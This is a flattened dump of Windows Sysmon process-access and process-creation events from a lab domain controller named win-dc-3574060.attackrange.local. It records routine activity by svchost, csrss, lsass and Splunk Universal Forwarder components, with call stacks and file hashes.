08:41:33.496{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002332Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:33.496{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002331Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:33.496{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002330Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:33.496{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002329Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:33.496{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16BD-5F84-6C00-000000007F01}3672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002328Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:33.496{5D479F2C-16B1-5F84-3000-000000007F01}26164088C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16BD-5F84-6C00-000000007F01}3672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002327Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:33.496{5D479F2C-16BD-5F84-6C00-000000007F01}3672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002354Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.496{5D479F2C-16BE-5F84-6D00-000000007F01}36683908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002353Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.339{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16BE-5F84-6D00-000000007F01}3668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002352Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002351Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002350Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002349Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002348Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002347Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002346Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002345Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002344Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002343Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.339{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16BE-5F84-6D00-000000007F01}3668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002342Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.339{5D479F2C-16B1-5F84-3000-000000007F01}26164088C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16BE-5F84-6D00-000000007F01}3668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002341Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.172{5D479F2C-16BE-5F84-6D00-000000007F01}3668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002374Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.527{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002373Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.527{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002372Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.527{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002371Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.527{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002370Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.527{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 